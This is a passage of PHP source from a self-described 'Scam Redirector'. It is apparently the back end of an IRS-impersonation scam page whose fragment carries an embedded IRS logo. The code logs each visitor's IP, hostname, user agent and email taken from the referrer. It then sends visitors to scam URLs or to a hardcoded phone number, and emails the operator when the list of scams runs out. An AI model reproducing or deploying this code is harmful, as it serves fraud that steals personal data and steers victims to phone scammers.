jAxOHptMTUuMTc3LTQxLjcyMWgtMTIuNTExbC0yMC4wMjggNjUuNDQ2aDEwLjJsNC4zMDEtMTQuMDkyaDIzLjc5MWw0LjMyMiAxNC4wOTJoMTcuNzM4bC0xOS44NTYtNTguODAzYy0xLjgxNC01LjM3OS0yLjgzMy02LjY0My03Ljk1Ny02LjY0M3oiLz48cGF0aCBkPSJNNzUuNDYgNTcuMDY0aC00LjY1NHYtNDguMjA1aDguNDExYzQuMDUgMCA3LjU0MyAzLjM0IDcuNTQzIDcuMzc1IDAgMS40MjQtLjI2NSAyLjc1LTEuNjUxIDQuNzRsLTUuNDUxIDguMThjNS43MDQgMS4zNjUgOS41MTYgNS43MTMgOS41MTYgMTMuODMyIDAgOS44NzMtNS45MDcgMTQuMDc4LTEzLjcxNCAxNC4wNzhtMTYuNTE4LTMxLjA3MmwzLjIxMy00Ljc0MWM2Ljc1NC0xMC4wMzMgMi4xMDYtMjAuOTIzLTExLjI1OS0yMC45MjNoLTI4LjUzNHY2NS40OGgyNy41MTZjMjQuMTk3IDAgMzEuNDQzLTI4LjE4IDkuMDY0LTM5LjgxNiIvPjxwYXRoIGQ9Ik0yMC4wNTUgNTcuMDY0aC00LjYxNnYtNDguMjA1aDguMzdjNC4wNTcgMCA3LjU3OCAzLjM0IDcuNTc4IDcuMzc1IDAgMS40MjQtLjI2MSAyLjc1LTEuNjcgNC43NGwtNS40ODMgOC4xOGM1LjcyMyAxLjM2NSA5LjUzMSA1LjcxMyA5LjUzMSAxMy44MzIgMCA5Ljg3My01Ljg5OSAxNC4wNzgtMTMuNzEgMTQuMDc4bTE2LjUxOC0zMS4wNzJsMy4xODgtNC43NDFjNi43ODItMTAuMDMzIDIuMTM1LTIwLjkyMy0xMS4yNjUtMjAuOTIzaC0yOC40OTYwMDAwMDAwMDAwMDJ2NjUuNDhoMjcuNTE4YzI0LjE3MyAwIDMxLjQ4Ny0yOC4xOCA5LjA1NS0zOS44MTYiLz48cGF0aCBkPSJNMTQ3Ljk3NC4zMjhsLTE0Ljc3NCA0OS43MjEtMTIuNDI3LTQxLjE5Yy0yLjMzLTcuMzc5LTMuNTE0LTguNTMxLTcuOTg1LTguNTMxaC0xMS41NTRsMjEuNDE3IDY1LjQ1OWgxNS43MjdsMTkuOTUzLTY1LjQ1OWgtMTAuMzU3eiIvPjwvZz48L3N2Zz4=" alt="IRS">
1224 </body></html>
1225EOT;
1226 echo $data;
1227} else
1228{
1229 GetEmail($referrer, $ip);
1230 $fhandle = fopen(LOG_FILE, "a");
1231 fwrite($fhandle, "<font color=green>" . $ip . "</font> - " . $hostname . " - " .
1232 $dt . " - " . $agent . " - " . MailFromReferrer($referrer) . " - " . NumberFromUri() . " - " . counter() .
1233 "<br/>");
1234 fclose($fhandle);
1235 $nor = $nor+1;
1236 WriteStats($tim, $vst, $unq, $bnd, $wat, $nor);
1237
1238 $scam_url = ScamURL($scams);
1239 /*Need to modify this code, once ScamURL($scams) will return the last scam, then send email, one scam left messag and out of scams, send mail with smtp or mail*/
1240 //Send an email if you only have one scam!
1241 if ($send_email == 1)
1242 {
1243 if ($i == (count($scams) - 1))
1244 {
1245 //Send Email
1246 $fh = fopen('sent.txt', 'r');
1247 $data = fread($fh, 512);
1248 fclose($fh);
1249
1250 if ($data == 0) {
1251
1252 $subject = "ALERT: Scam Redirector (Out of Scams)";
1253 $date = date("Y-m-d");
1254 $message = "Your Scam Redirector is out of scams.<br /><br />URL: <a href=http://".$_SERVER['SERVER_NAME'].INDEX.">http://".$_SERVER['SERVER_NAME'].INDEX."</a><br />Version: ".VERSION."<br />Date: $date";
1255
1256 $headers = "MIME-Version: 1.0\r\n";
1257 $headers .= "Content-type: text/html; charset=iso-8859-1 \r\n";
1258 $headers .= "From: Scam Redirector <sss@scamredirector.cash>\r\n";
1259
1260 mail(EMAIL, stripslashes($subject), stripslashes($message), stripslashes($headers));
1261
1262 $fh = fopen('sent.txt', 'w');
1263 fwrite($fh, "1\n");
1264 fclose($fh);
1265 }
1266 } else
1267 {
1268 $fh = fopen('sent.txt', 'w');
1269 fwrite($fh, "0\n");
1270 fclose($fh);
1271 }
1272 }
1273
1274 if (!empty($scam_url))
1275 {
1276
1277 //header("Location: " . $scam_url . "");
1278
1279 header("Location: tel:8885041726");
1280
1281 } else
1282 {
1283
1284 header("Location: " . REDIRECT_TO);
1285 }
1286
1287}
1288?>